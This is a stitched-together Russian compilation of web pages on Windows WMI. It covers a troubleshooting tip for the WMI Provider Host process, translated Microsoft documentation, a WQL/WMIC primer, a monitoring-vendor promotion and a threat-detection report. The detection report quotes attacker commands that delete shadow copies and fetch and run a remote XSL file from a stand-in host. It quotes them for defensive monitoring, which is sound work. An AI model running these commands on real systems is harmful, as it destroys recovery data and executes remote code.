В первую очередь, необходимо выявить истинную причину неисправности. Проще всего начать с антивирусной проверки, дабы отбросить вариант с вредоносным ПО. Я рекомендую использовать связку AdwCleaner + DrWeb CureIT. Обе эти программ бесплатны, не требуют установки – просто запускаете поочередно, дожидаетесь завершения сканирования, перезагружаете компьютер и проверяете, осталась проблема с WMI Provider Host в Windows 10 или нет.

Также Вы можете запустить диспетчер задач, нажав Ctrl + Esc + Shift и найти в списке «прожорливый» элемент и кликнуть по нему правой кнопкой мышки. В появившемся меню выбираем «Открыть расположение файла»:

Если в итоге откроется папка, путь которой не «Windows / System32 (или System)», то имеющийся объект 100% является вирусом. Тогда точно стоит запустить глубокую проверку указанными выше утилитами.

Как отключить WMI Provider Host?

Если файл WMIPrvSE.exe продолжает создавать неприятности и не является вирусом, значит стоит попробовать следующие варианты. Предстоит узнать, какое оборудование или программное обеспечение становится фактором негативного воздействия. С чего начать?

Теперь переходим непосредственно к отключению службы WMI Provider Host, если вышеописанные способы не сработали:

К слову, этот способ нельзя назвать самым правильным, но другого пока нет. Разработчики уверяют, что скоро выпустят исправления. А пока остается подвергать свою систему риску сбоев ради комфортной работы без «тормозов».

Если возникли вопросы по теме, можете задавать их в комментах. Но предварительно рекомендую посмотреть видео с наглядной инструкцией:

Немножко разобрались с WMI Provider Host — что это за процесс грузит процессор. Хотелось бы верить, что программисты Майкрософт создадут эффективный способ устранения проблемы.

Источник

Видео

Отключение инструментария Windows 10

Отключение ВСЕХ ненужных служб в Windows 10 | Оптимизация Windows 10

РЕШЕНИЕ.системные прерывания, процессор 100{45a235b406a91867cb23f552a8a1e13a6fde2d0f1e0b2244a7f05b50c91d5cbd}, майнер вирус.

Что точно не стоит отключать в Windows?

Игорь Стрелков. Торговый центр в Кременчуге. Мобилизация.

Как отключить процесс Antimalware Service Executable?

КАК ОТКЛЮЧИТЬ АНТИВИРУС на Windows 10?

Как отключить SmartScreen в Windows 10

Как отключить защитник Windows 10 (новое)

Отключение Antimalware Service Executable. 100{03cacec9b4ac8b6079be5a5cf2962f0ac867d74b38a36d3f8176969daf03e772} рабочий способ + тест распаковки большого архива.

Инструментарий управления Windows — приложения Win32

Редактировать

Твиттер LinkedIn Фейсбук Эл. адрес

  • Статья
  • 2 минуты на чтение

Назначение

Инструментарий управления Windows (WMI) — это инфраструктура для управления данными и операциями в операционных системах на базе Windows. Вы можете писать сценарии или приложения WMI для автоматизации административных задач на удаленных компьютерах, но WMI также предоставляет данные управления другим частям операционной системы и продуктов, например, System Center Operations Manager (ранее Microsoft Operations Manager (MOM)) или Windows Удаленное управление (WinRM).

Примечание

Эта документация предназначена для разработчиков и ИТ-администраторов. Если вы являетесь конечным пользователем, который столкнулся с сообщением об ошибке, касающимся WMI, вам следует обратиться в службу поддержки Microsoft и найти код ошибки, который вы видите в сообщении об ошибке. Дополнительные сведения об устранении неполадок со сценариями WMI и службой WMI см. в разделе WMI не работает!

Примечание

WMI полностью поддерживается Microsoft. Однако последняя версия административных сценариев и элементов управления доступна через инфраструктуру управления Windows (MI). MI полностью совместим с предыдущими версиями WMI и предоставляет множество функций и преимуществ, которые упрощают проектирование и разработку поставщиков и клиентов. Дополнительные сведения см. в разделе Инфраструктура управления Windows (MI).

Где применим WMI?

WMI можно использовать во всех приложениях на базе Windows, и он наиболее полезен в корпоративных приложениях и административных сценариях.

Системные администраторы могут найти информацию об использовании WMI в различных книгах по WMI. Дополнительные сведения см. в разделе Дополнительная информация.

Аудитория разработчиков

WMI предназначен для программистов, использующих C/C++, приложение Microsoft Visual Basic или язык сценариев с ядром в Windows и обрабатывающим объекты Microsoft ActiveX. Хотя некоторое знакомство с программированием COM полезно, разработчики C++, которые пишут приложения, могут найти хорошие примеры для начала работы в разделе Создание приложения WMI с помощью C++.

Сведения о разработке поставщиков управляемого кода или приложений на C# или Visual Basic .NET с использованием .NET Framework см. в разделе WMI в .NET Framework.

Многие администраторы и ИТ-специалисты получают доступ к WMI через PowerShell. Командлет Get-WMI для PowerShell позволяет получать информацию для локального или удаленного репозитория WMI. Таким образом, ряд тем и классов, особенно в разделе «Создание клиентов WMI», содержат примеры PowerShell. Дополнительные сведения об использовании PowerShell см. в разделе Windows PowerShell.

Требования к среде выполнения

Дополнительные сведения о том, какая операционная система требуется для использования определенного элемента API или класса WMI, см. в разделе «Требования» каждого раздела документации WMI.

Если ожидаемый компонент отсутствует, см. раздел Доступность операционной системы для компонентов WMI.

Вам не нужно загружать или устанавливать специальное программное обеспечение (SDK), чтобы создавать сценарии или приложения для WMI. Однако есть некоторые инструменты администрирования WMI, которые разработчики считают полезными. Дополнительные сведения см. в разделе «Загрузки» в разделе «Дополнительная информация».

В этом разделе

Тема Описание
О WMI Общая информация о WMI.
Использование WMI Информация о том, как разрабатывать приложения для использования WMI, включая информацию об инструментах.
Ссылка WMI Документация по классам WMI, классам C++ WMI, COM API WMI, API сценариев и другим справочным материалам WMI.
Глоссарий WMI Инструментарий управления Windows (WMI) использует собственный набор терминов. Многие из этих терминов знакомы разработчикам, но имеют новые или измененные определения в среде WMI.

О WMI — приложения Win32

Редактировать

Твиттер LinkedIn Фейсбук Эл. адрес

  • Статья
  • 3 минуты на чтение

Инструментарий управления Windows (WMI) — это реализация Microsoft управления предприятием через Интернет (WBEM), представляющая собой отраслевую инициативу по разработке стандартной технологии доступа к информации управления в корпоративной среде. WMI использует отраслевой стандарт Common Information Model (CIM) для представления систем, приложений, сетей, устройств и других управляемых компонентов. CIM разрабатывается и поддерживается Целевой группой по распределенному управлению (DMTF).

Примечание

В настоящее время доступно следующее поколение WMI, известное как инфраструктура управления Windows (MI). MI полностью совместим с предыдущими версиями WMI и предоставляет множество функций и преимуществ, которые упрощают проектирование и разработку поставщиков и клиентов. Например, многие новые поставщики написаны с использованием среды MI, но доступ к ним можно получить с помощью сценариев и приложений WMI. Дополнительные сведения о различиях между двумя технологиями см. в разделе Зачем использовать MI?

 

Управление удаленными компьютерными системами с помощью WMI

Возможность получать данные управления с удаленных компьютеров делает WMI полезным. Удаленные подключения WMI выполняются через DCOM. Альтернативой является использование удаленного управления Windows (WinRM), которое получает данные удаленного управления WMI с помощью протокола WS-Management на основе SOAP.

Программирование с помощью WMI

Приложения или сценарии управления могут получать данные или выполнять операции через WMI на различных языках. Дополнительные сведения см. в разделе «Аудитория разработчиков» на странице Инструментарий управления Windows.

Многие функции Windows имеют связанных поставщиков WMI, таких как поставщик данных конфигурации загрузки (BCD) или поставщик томов хранилища. Поставщики WMI реализуют функциональные возможности, описанные методами и свойствами классов WMI, для управления связанными функциями Windows. Дополнительные сведения см. в разделе Поставщики WMI и классы WMI.

Дополнительные сведения о том, как написать поставщика для предоставления данных из нового оборудования или приложений, см. в разделе Предоставление данных WMI.

Дополнительные сведения о реализации этой технологии см. в разделе Использование WMI.

В следующей таблице перечислены темы, включенные в этот раздел.

Секция Описание
Что нового в WMI Новые возможности WMI.
Операционная система Доступность компонентов WMI Некоторые компоненты больше не доступны или доступны для дополнительной установки.
Архитектура WMI Приложение управления взаимодействует с WMI с помощью различных интерфейсов, таких как Visual Basic, C++, ODBC и ActiveX. Все интерфейсы WMI основаны на объектной модели компонентов (COM).
Общая информационная модель Независимая от языка модель программирования, использующая объектно-ориентированные методы для описания предприятия.
Формат управляемого объекта Формат, позволяющий создавать удобочитаемый код, который операционная система может преобразовать в набор классов CIM. Вы можете использовать новые классы для моделирования и управления новыми технологиями для предприятия.
Контроль учетных записей пользователей и WMI Управление учетными записями пользователей (UAC) влияет на то, какие данные WMI возвращаются, на удаленный доступ и на то, как должны выполняться сценарии. Дополнительные сведения см. в разделе Начало работы с контролем учетных записей в Windows Vista.
Доступ к защищаемым объектам WMI WMI использует стандартные объекты и процедуры безопасности Windows для контроля и защиты доступа к защищаемым объектам, таким как пространства имен WMI, принтеры, службы и приложения DCOM.
Библиотеки производительности и WMI Данные счетчиков производительности системы доступны в классах WMI.
Поддержка IPv6 и IPv4 в WMI Поставщик IP-маршрутов WMI и сетевые классы предоставляют данные для адресов IPv4. Начиная с Windows Vista, WMI также предоставляет ограниченную поддержку сетевых возможностей IPv6.
Формат даты и времени WMI использует форматы даты и времени, определенные спецификацией CIM рабочей группы по распределенному управлению. Для получения дополнительной информации см. DMTF.
Скриптовый доступ к WMI Напишите сценарии WMI для выполнения задач управления.
Поиск и устранение неисправностей WMI При доступе к локальным или удаленным данным WMI в приложении или сценарии вы можете получить сообщения об ошибках, начиная от отсутствия классов и заканчивая отказом в доступе. У провайдеров также есть варианты отладки и классы устранения неполадок.
Дополнительная информация Веб-сайты, книги и статьи о WMI.

 

Использование WMI

Ссылка WMI

 

 

Краткое руководство по инструментарию управления Windows (WMI)

Платформа для управления информацией и действиями в операционных системах на базе Windows называется инструментом управления Windows (WMI).

WMI также предоставляет данные управления другим компонентам операционной системы и продуктам, таким как SCOM (System Center Operations Manager) или удаленное управление Windows.

Что такое Windows Management Instrumentation (WMI?)

WMI — это платформа для управления и мониторинга операционной системы и других приложений и служб Microsoft на персональных компьютерах, серверах и других сетевых устройствах.

WMI предоставляет комплексный, масштабируемый и простой в использовании программный интерфейс, обеспечивающий программный доступ к информации и службам на компьютерах, управляемых Microsoft, и других сетевых устройствах.

Используется для обнаружения и мониторинга операционной системы, служб и приложений на компьютере, а также данных реестра и файловой системы. Он также используется для создания и управления сценариями и программами, автоматизирующими управление и администрирование компьютера.

Он использует язык программирования WQL (язык запросов Windows) для запроса информации и выполнения операций с операционной системой, компьютерами и устройствами.

Это также дает вам доступ к PowerShell, одному из самых мощных и гибких инструментов администрирования для Windows, который вы можете использовать для создания сценариев автоматизации.

Кроме того, WMI позволяет создавать пользовательские приложения, предоставляющие дополнительные функции для управления и администрирования систем и приложений Windows.

Пользователи, которым необходимо следить за состоянием своих машин, устранять базовые неполадки и собирать данные о производительности, найдут WMI удобным.

Какова цель WMI?

Инструментарий WMI полезен в корпоративной сети Windows, поскольку он упрощает работу и управление компонентами корпоративной сети, предоставляя данные другим продуктам для дальнейшего расширения и масштабирования.

Основная цель WMI — предоставить единую структуру управления для всех аспектов системы Windows, таких как:

  • Компоненты операционной системы
  • Процессы и потоки
  • Сервисы
  • Устройства
  • Драйверы
  • Приложения
  • Пользовательские учетные записи
  • Средства безопасности

Цель Цели связанных с системами Windows. WMI также позволяет отслеживать системные события и собирать данные о производительности. Эти данные можно использовать для устранения неполадок или отслеживания тенденций с течением времени.

WMI чаще всего используется для автоматизации административной работы и получения доступа к данным без непосредственного обращения к операционной системе. В результате WMI является фантастической альтернативой для администраторов и разработчиков программного обеспечения, которым необходимо автоматизировать трудоемкие процессы.

С его помощью возможно все, от мониторинга производительности системы до сбора данных приложений. Это позволяет разработчикам создавать более интеллектуальные и интеллектуальные приложения, а также гарантирует, что ИТ-администраторы смогут выполнять свои задачи с минимальными усилиями.

WMI предоставляет эталонную реализацию для доступа к системной информации и является ключевым инструментом для управления и мониторинга систем Windows. Это краеугольный камень машинного обучения Azure и AzureML, и он используется для поддержки широкого спектра сторонних продуктов.

Использование WMI

Инструментарий управления Windows (WMI) — это решение Microsoft для управления предприятием через Интернет (WBEM), отраслевая инициатива по разработке стандартизированных технологий доступа к информации корпоративного управления.

WMI представляет системы, приложения, сети, устройства и другие управляемые компоненты с использованием отраслевого стандарта Common Information Model (CIM). Целевая группа по распределенному управлению (DMTF) создает и поддерживает CIM.

Конструкция WMI универсальна, поддерживает широкий спектр функций администрирования и управления, а также обеспечивает гибкую и расширяемую архитектуру, которая позволяет производителям создавать новых поставщиков WMI для поддержки новых устройств, приложений и других усовершенствований.

Другое использование:

  • Комплексное управление операционной системой Windows и сетевыми устройствами и службами Microsoft.
  • Может использоваться для подключения удаленных компьютеров для доступа к данным WMI.  
  • Обнаруживает информацию о системе, например, какие программы запущены и какие службы настроены.
  • Для получения информации о характеристиках оборудования и выполнения действий, таких как выключение или перезагрузка системы.
  • Запуск приложений, запуск, остановка, настройка служб и доступ к данным.
  • Разработчики приложений управления могут использовать этот API для создания сценариев в Visual Basic или Windows Scripting Host (WSH).

Архитектура WMI

WMI (Инструментарий управления Windows) — это технология Microsoft, изначально представленная в Windows 2000. Она позволяет программистам создавать программы управления, которые работают с любой системой, поддерживающей WMI.

Давайте посмотрим на архитектуру и терминологию WMI.

Поток архитектуры WMI начинается с объектов: Такой компонент, как жесткий диск, сетевая карта, операционная система или служба, является управляемым объектом (которым можно управлять через WMI). Инфраструктура WMI получает данные от объекта через провайдера. Он предоставляет и получает сообщения от WMI и передает их объекту.

Поставщик WMI содержит библиотеку DLL и файл формата управляемых объектов (MOF), который отслеживает события и данные от объектов. WMI классифицирует провайдеров в соответствии с функциональностью, предоставляемой интерфейсом провайдера.

В Windows имеется множество встроенных поставщиков WMI, включая поставщика Active Directory, поставщика WMI данных конфигурации загрузки (BCD), поставщика распределенной файловой системы (DFS), поставщика журнала событий, поставщика Hyper-V WMI, поставщика Win32, реестра провайдер и провайдер SNMP.

Инфраструктура WMI — это компонент операционной системы Microsoft Windows, известный как служба WMI (winmgmt). Ядро WMI и репозиторий WMI являются двумя частями инфраструктуры WMI.

Репозиторий WMI представляет собой иерархическое хранилище данных, организованное пространствами имен WMI, часто называемое общей информационной моделью (CIM). Служба WMI устанавливает ряд пространств имен при запуске системы, включая корневое пространство по умолчанию, rootcimv2 и корневую подписку.

Кроме того, служба создает набор определений классов по умолчанию, который включает системные классы Win32 и WMI. Другие пространства имен WMI могут быть созданы дополнительными поставщиками WMI, и каждое пространство имен содержит несколько объектов WMI.

Служба WMI действует как посредник между поставщиками, приложениями управления и репозиторием WMI. В репозитории хранятся только статические данные об объектах, например классы, определенные провайдерами. WMI динамически получает большую часть данных от поставщика, когда клиент запрашивает их.

Потребитель WMI — это управляющее приложение или сценарий, взаимодействующий с инфраструктурой WMI. Используя COM API для WMI или Scripting API для WMI, программа управления может запрашивать, детализировать данные, запускать методы поставщика и подписываться на события.

WMI создает стандартизированный интерфейс для удаленного и локального получения данных управления. Единый интерфейс абстрагируется от интерфейсов прикладного программирования (API) операционной системы. Это позволяет приложениям и сценариям собирать данные управления без необходимости знать об API операционной системы.

Как выполнить запрос WMI?

Особенностью универсальности платформы WMI является возможность запрашивать ее репозиторий для получения подробной информации о классе, экземпляре или данных схемы. Эти показатели связаны с инвентаризацией локальных и удаленных систем, операционных систем, программного обеспечения и других административных действий.

Тип запросов

В целом существует два типа запросов, используемых для извлечения информации из репозитория WMI:

Синхронный запрос: Это запрос, который контролирует работу вашего приложения на протяжении всего запроса. Это проще, чем асинхронный вызов, поскольку требуется только один вызов интерфейса. Однако для больших поисков или сетевых запросов это может привести к зависанию вашего приложения.

Асинхронный запрос: Когда на скорость системы или сети будет влиять запрос значительной группы данных, предпочтительнее использовать асинхронный запрос.

WQL (язык запросов WMI)

Одним из популярных методов запроса WMI является язык запросов WMI.

SQL (язык структурированных запросов) используется в среде базы данных, а WQL используется в WMI. Они оба имеют схожую синтаксическую структуру.

Выберите , Из и Где — основные операторы WQL, используемые для запуска запроса.

Типичный запрос WMI начинается с выбора всех свойств из класса WMI с помощью команды «Выбрать». Звездочка («*») используется для выбора каждого свойства из класса WMI. Можно использовать ключевое слово «От», чтобы указать класс WMI для запроса после выбора свойств (одно или несколько свойств или все из них). Вы можете проверить точный синтаксис в шпаргалке SQL.

WQL можно выполнить с помощью WMI Tester (wbemtest.exe), который по умолчанию устанавливается вместе с операционной системой Windows. Запросы WMI также можно выполнять с помощью Windows PowerShell, VBScript и языка C.

Тип запросов WQL

Запросы WQL используются для получения трех различных типов информации.

Запросы объектов: С помощью этих запросов можно получить информацию о системных ресурсах Windows.

Запросов событий: Эти запросы используются для отслеживания изменений в журналах событий, запуска процессов, состояния служб, доступности компьютеров или объема свободного места на диске, а также других сущностей или событий.

Запросы схемы: Эти запросы используются для получения сведений о структуре схемы WMI.

Выполнение запроса

Давайте посмотрим, как выполнить объектный запрос.

В следующем методе указано, как проверить процессы WIN_32 в локальной системе.

Инструмент WMI Tester запускается из командной строки путем ввода wbemtest.exe.

Появится следующее окно.

Чтобы подключиться к пространству имен WMI, содержащему класс, который вы хотите запросить (в большинстве случаев Root\Cimv2 ): щелкните вкладку подключения.

Чтобы выполнить запрос, щелкните вкладку «Запрос», как показано ниже:

Затем введите запрос, для которого вы хотите получить информацию. Например, давайте получим все процессы, запущенные в локальной системе, выполнив:

 select * From Win32_process 

После нажатия на вкладку «Применить» вы получите следующие результаты. из всех процессов win_32 используется следующий код:

 Get-WmiObject -Class Win32_Process 

Чтобы получить все параметры запроса PowerShell, посетите страницу управления Microsoft PowerShell.

Чтобы выполнить этот запрос на языке VBScript и C, страница документации Microsoft предоставит полную информацию.

Еще один способ запроса репозитория WMI — через команду WMIC:

  • Запустите CMD из командной строки
  • Введите WMIC и введите, чтобы запустить программу
  • Затем командная строка изменится на wmic:root\cli >

Администраторы могут выполнять запросы WMI из этого приглашения.

Например, чтобы загрузить информацию о ЦП локальной системы, введите следующую команду:

 wmic:root\cli> WMIC CPU 

Результаты/информация будут отображаться в командной строке.

 AddressWidth  Architecture  AssetTag                Availability  Caption                                 Characteristics  ConfigManagerErrorCode  ConfigManagerUserConfig  CpuStatus  CreationClassName  CurrentClockSpeed ​​ CurrentVoltage  DataWidth  Description                             DeviceID  ErrorCleared  ErrorDescription  ExtClock  Family  InstallDate  L2CacheSize  L2CacheSpeed ​​ L3CacheSize  L3CacheSpeed ​​ LastErrorCode  Level  LoadPercentage  Manufacturer  MaxClockSpeed ​​ Name                                      NumberOfCores  NumberOfEnabledCore  NumberOfLogicalProcessors  OtherFamilyDescription  PartNumber              PNPDeviceID  PowerManagementCapabilities  PowerManagementSupported  ProcessorId       ProcessorType  Revision  Role  SecondLevelAddressTranslationExtensions  SerialNumber            SocketDesignation  Status  StatusInfo  Stepping SystemCreationClassName SystemName ThreadCount UniqueId UpgradeMethod Версия VirtualizationFirmwareEnabled VMMonit orModeExtensions
64 9Заполняется O. E.M. 3 Intel64 Family 6 Model 142 Stepping 10 252 1 Win32_Processor 1801 7 64 Intel64 Family 6 Model 142 Stepping 10 CPU0 100 205 1024 6144 0 6 31 GenuineIntel 1801 Intel(R) Core(TM) i5-8250U CPU @ 1.60GHz 4 4 8 To Быть заполненным OEM FALSE BFEBFBFF000806EA 3 CPU TRUE Будет заполнен OEM. U3E1 OK 3 Win32_ComputerSystem RENEE-HP 8 51 ЛОЖЬ ИСТИНА 

Дополнительные сведения о псевдонимах WMIC и глаголах см. на веб-сайте Microsoft wmic.

Часто задаваемые вопросы по WMI

Какие порты используются в WMI?

Используемые порты: 49152 и 65535. Объектная модель распределенных компонентов (DCOM), на которой основан WMI, по умолчанию использует случайно выбранный порт TCP для соединений в диапазоне от 49152 до 65535.

Является ли WMI устаревшим?

WMI по-прежнему поддерживается. Начиная с Windows 10 версии 21h2 и полугодового выпуска канала Windows Server 21h2 программа командной строки WMI (WMIC) больше не поддерживается.

Что такое средства мониторинга WMI?

Существует множество инструментов для мониторинга WMI. Тем не менее, некоторые из них особенно популярны:
SolarWinds WMI Monitor с сервером и монитором приложений
Paessler WMI Service Sensor с PRTG
Nagios XI
Sapien WMI Explorer
Бесплатные инструменты WMI Explorer, Adrem Бесплатные инструменты WMI

Как устранить неполадки Проблемы WMI

При попытке доступа к локальным или удаленным данным WMI в приложении или сценарии вы можете увидеть ошибки, начиная от отсутствия классов и заканчивая нарушениями прав доступа. Ознакомьтесь с руководством по устранению неполадок Microsoft WMI, чтобы найти решения таких ошибок.

Заключение

В общем, Инструментарий управления Windows — это мощный инструмент, который можно использовать для управления широким спектром различных функций, связанных с системой Windows. WMI может быть очень полезным инструментом для всех, кто имеет дело с системами Windows, несмотря на то, что поначалу он может показаться пугающим.

Что такое WMI? Давайте узнаем все об этом в этой статье

Что такое WMI? Это новая марка немецких автомобилей? Неа. Поскольку нам нравится исследовать обширные области знаний, мы попытаемся подходит к этому вопросу: Что такое WMI? Есть люди, у которых нет властной потребности овладеть концепцией, например, таксисты, но есть и другие смелые люди, которые будут жить намного лучше со знанием этих навыков. Итак, что такое WMI?

Что такое WMI? Базовый подход к концепции

WMI ( Инструментарий управления Windows ) является технологическим изобретением Microsoft, целью которого является забота о различных операционных средах Windows.

Набор средств управления Windows ( WMI ) состоит из набора расширений модели драйверов Windows, которые предоставляют интерфейс операционной системы, так что ее компоненты предоставляют нам информацию и различные типы уведомлений.

WMI — это реализация Microsoft стандартов веб-управления бизнесом (WBEM), общей информационной модели (CIM) и Целевой группы по распределенному управлению (DMTF).

WMI позволяет языкам сценариев (таким как VBScript или Windows PowerShell) управлять Персональные компьютеры и серверы Microsoft Windows , как локально, так и удаленно. WMI предустановлен в Windows 2000 и новейших операционных системах Microsoft. Его также можно загрузить для Windows NT, Windows 95 и Windows 98.

Microsoft также предоставляет интерфейс командной строки для WMI, называемый командной строкой инструментария управления Windows (WMIC).

Что мы можем сделать с WMI?

Теперь, когда мы усвоили и усвоили, что такое WMI, давайте рассмотрим несколько простых вещей, для которых мы можем использовать .

Как мы уже упоминали, через WMI будет легко управлять как непосредственными, так и удаленными компьютерами, имея возможность программировать процессы, которые будут выполняться в указанные и выбранные моменты; инициировать его и начать работу на удаленном компьютере; также перезапустить их на расстоянии, если это необходимо; получить списки приложений, установленных на нашем компьютере, на остальных локальных компьютерах, а также на удаленных; сообщить нам о реестрах событий Windows, в локальные компьютеры как на удаленных…

Необходимо знать, что поскольку WMI поставляется с набором готовых к использованию интерфейсов автоматизации, все функции администрирования, поддерживаемые провайдером WMI и его набором классов, поддерживаются скриптами для немедленное и бесплатное использование. Помимо проектирования классов WMI и разработки поставщиков, группам разработчиков и тестировщиков Microsoft не требуется создавать, проверять и тестировать модель сценариев, поскольку она фактически доступна в WMI .

Цели WMI

Можно считать, что цель WMI состоит в том, чтобы определить набор спецификаций, независимых от среды, которые позволяют совместно использовать информацию управления между одними и теми же приложениями управления.

WMI предписывает стандарты управления предприятием и связанные с ними технологии для Windows, которые работают с существующими стандартами управления. Подобно интерфейсу управления рабочим столом (DMI) и SNMP , WMI дополняет эти стандарты, предоставляя единую модель. Эта модель представляет собой среду, через которую можно получить общий доступ к данным управления из любого источника.

Попробуем упростить. WMI работает примерно так же, как база данных ; он предлагает вам большую и разнообразную информацию, которая будет наиболее полезна для систем мониторинга, основанных на Windows.

Представьте себя перед панелью управления прибором . У вас есть весь необходимый доступ к его частям, и вы можете наблюдать за уровнями, которые соответствуют наиболее личным переменным компьютера, работающего в среде Microsoft Windows. WMI использует свой язык, чтобы предоставить нам репрезентативные примеры функционирования систем, приложений, сетей, различных устройств и т. д.

Кстати, вы знаете, кто делает это как никто другой и является чемпионом по мониторингу? Pandora FMS , гибкая система мониторинга, способная отслеживать устройства, инфраструктуры, приложения, сервисы и бизнес-процессы.

Например, в следующем видео показано, как удаленно создать и настроить WMI-модуль в Pandora FMS:

Хотите узнать больше о Pandora FMS? Нажмите здесь: https://pandorafms.com/

Или, если вам нужно контролировать более 100 устройств, вы также можете0325 30 дней БЕСПЛАТНАЯ ДЕМО-версия Pandora FMS Enterprise. Получи это здесь.

Команда Pandora FMS будет рада помочь вам!

Группа Pandora FMS

Экипировка Pandora FMS предназначена для объединения аналитиков и профессионалов TI с единой группой в общем: для мониторинга информационных систем.

Редакционная группа Pandora FMS состоит из группы писателей и ИТ-специалистов, которых объединяет одно: их страсть к мониторингу компьютерных систем.

Инструментарий управления Windows — отчет об обнаружении угроз

 

Звуки угроз

Злоумышленник может использовать инструментарий управления Windows (WMI) для горизонтального перемещения по системе, фактически притворяясь администратором. Тем временем мы делаем вид, что инди-рок ранних нулевых все еще крут.

Анализ

Почему злоумышленники используют WMI?

Примечание: WMI не имеет подметодов.

Как и многие угрозы, отмеченные в этом отчете, WMI — это встроенная функция Windows, которую можно использовать в локальных или удаленных системах. Администраторы регулярно используют WMI для:

  • настройки систем
  • выполнения процессов или сценариев
  • автоматизации задач

То, что делает WMI полезным для администраторов, также делает его привлекательным для злоумышленников. Обратите внимание: поскольку WMI может выполнять эти задачи как в локальных, так и в удаленных системах, злоумышленники могут использовать его для бокового перемещения. Кроме того, поскольку WMI обычно используется в безвредных целях, вредоносная деятельность часто смешивается с законной деятельностью.

Как злоумышленники используют WMI?

Злоумышленники используют WMI для:

  • горизонтального перемещения
  • сбора информации
  • изменения систем
  • достижения устойчивости

Прежде чем углубляться в то, как злоумышленники используют WMI, необходимо понять, что WMI состоит из клиентского и серверного компонентов. Наиболее известными клиентами являются утилита командной строки wmic. exe (также известная как WMIC) и командлет PowerShell Get-WMIObject . Как администраторы, так и злоумышленники используют оба для целей, упомянутых выше. Потому что мы наблюдаем wmic.exe гораздо чаще, чем Get-WMIObject , приведенные ниже примеры будут сосредоточены на первом. На стороне сервера wmiprvse.exe — или узел поставщика WMI — обслуживает многие, но не все запросы клиентов. Обратите внимание, что WMIC — не единственный клиент. Существует ряд двоичных файлов Windows, которые под капотом выполняют вызовы WMI, которые обрабатываются wmiprvse.exe tasklist.exe — один из примеров.

Это важно помнить, потому что если вы видите подозрительную активность, связанную с родительским процессом wmiprvse.exe , возможно, вы имеете дело со злоумышленником, который использует wmic.exe в удаленной системе для выполнения полезных нагрузок в системе, которую вы исследуете — форма бокового перемещения. Вот метод бокового перемещения WMI, который мы часто видим:

 wmic.exe /node: вызов процесса create 

На целевом хосте данный процесс будет отображаться как дочерний процесс wmiprvse.exe . Если ваши политики аудита безопасности регистрируют события входа в систему, вы должны увидеть соответствующее событие входа в сеть (тип 3), связанное с этим действием. Варианты приведенной выше командной строки могут включать переданные учетные данные.

Другим распространенным способом использования злоумышленниками WMI, и в частности WMIC, является сбор информации и модификация систем. Во время атак программ-вымогателей злоумышленники часто перечисляют и удаляют тени томов, которые используются для восстановления файлов. Поскольку операторы программ-вымогателей часто используют утилиту Volume Shadow Administration, vssadmin.exe , для этой цели многие организации отправляют предупреждения в SOC при ее выполнении. Однако wmic.exe также можно использовать для управления тенями томов без вызова vssadmin. exe с помощью следующей команды:

 wmic shadowcopy delete /noninteractive 

По иронии судьбы, мы иногда видим менее скрытую версию этой атаки с использованием WMIC:

 wmic process call create vssadmin.exe delete shadows /all /quiet 

Приведенный выше шаблон приведет к тому, что wmiprvse.exe порождает процесс vssadmin.exe .

Помимо перечисления теней томов и управления ими, злоумышленники используют WMIC для перечисления и изменения десятков аспектов системы или среды Windows. Мы видели, как злоумышленники использовали WMIC для:

  • определить, какой антивирусный продукт может быть установлен
  • остановить службу брандмауэра
  • перечислить членство в группах (включая локальные и во многих конфигурациях, учетные записи администратора домена)
  • изменить десятки других интересных элементов

Мы также столкнулись с злоумышленники используют обработку сценариев XSL, которую можно использовать для обхода управления приложениями и — благодаря опции WMIC /format — для загрузки кода из удаленного места. Вот пример того, как это может выглядеть:

 wmic os get /FORMAT:"http://evilhacker.com/attacker.xsl" 

При выполнении вышеуказанной команды будет загружено и выполнено содержимое файла XSL.

Злоумышленники также используют WMI для сохраняемости через трио: потребители событий WMI, фильтры и привязки «фильтр-потребитель». Злоумышленники используют этот механизм сохраняемости для выполнения произвольного кода в ответ на действия на конечной точке, такие как вход или выход пользователя или запись файла по указанному пути.

Видимость

 

Примечание. Разделы видимости в этом отчете сопоставлены с источниками данных и компонентами MITRE ATT&CK.

Наши наиболее эффективные аналитические средства обнаружения злоупотреблений WMI со стороны злоумышленников почти полностью полагаются на сочетание мониторинга процессов и командной строки, которые широко доступны в коммерческих продуктах EDR и встроенных журналах событий Windows.

Мониторинг процессов

Процессы служат основой для большей части нашей аналитики обнаружения WMI. В отличие от многих других методов, злонамеренное использование WMI обычно проявляется в виде одного из двух процессов: wmic.exe или wmiprvse.exe . Фактически, большая часть фактического поведения, связанного с WMI, будет порождаться wmiprivse.exe . Например, если злоумышленник вызывает метод Create класса Win32_Process для выполнения бокового перемещения, исполняемый файл будет создан как дочерний процесс wmiprvse.exe в целевой системе.

Мониторинг команд

Несмотря на то, что у нас есть некоторые средства аналитики, в основном основанные на происхождении процессов, многие ищут сочетание процессов и аргументов командной строки. Get-WMIObject Командлет PowerShell выделяется как особенно полезный параметр для наблюдения за активностью WMI.

Коллекция

 

Примечание. В разделах коллекции этого отчета показаны определенные источники журналов из событий Windows, Sysmon и других источников, которые можно использовать для сбора соответствующей информации о безопасности.

Идентификатор события Windows 4688: Создание процесса

Как и многие другие методы атаки, регистрация событий запуска процесса (4688) с включенным ведением журнала из командной строки может быть богатым источником данных телеметрии. Говоря более абстрактно, событие с кодом 4688 — это прекрасное место, легко доступное в системах Windows, для наблюдения за WMI и другими действиями и начала отличать нормальное и доброкачественное от ненормального и подозрительного.

Идентификаторы событий Sysmon 19, 20 и 21: WmiEvents

Sysmon предоставляет определенные коды событий WMI (например, 19: обнаружена активность WmiEventFilter, 20: обнаружена активность WmiEventConsumer и 21: обнаружена активность WmiEventConsumerToFilter), которые полезны для наблюдения за злонамеренным использованием WMI. Если этот параметр включен, Sysmon регистрирует постоянные подписки WMI в журнале событий Microsoft-Windows-Sysmon/Operational, используя идентификаторы событий 19, 20 и 21 для создания фильтра событий, создания потребителя событий и создания привязки фильтра к потребителю соответственно. Легальное программное обеспечение иногда использует эти функции WMI, но они делают это нечасто, и их легко отследить на предмет злонамеренного использования.

Идентификатор события Windows 5861: Microsoft-Windows-WMI-Activity/Operational

Идентификатор события 5861 в журнале событий Microsoft-Windows-WMI-Activity/Operational надежно регистрирует постоянные подписки на события WMI. Постоянная подписка на события — это основное средство, с помощью которого злоумышленник может добиться сохраняемости с помощью WMI. Этот механизм постоянства предлагает злоумышленнику огромный контроль над условиями, в которых выполняется его полезная нагрузка.

Интерфейс сканирования на наличие вредоносных программ (AMSI), телеметрия

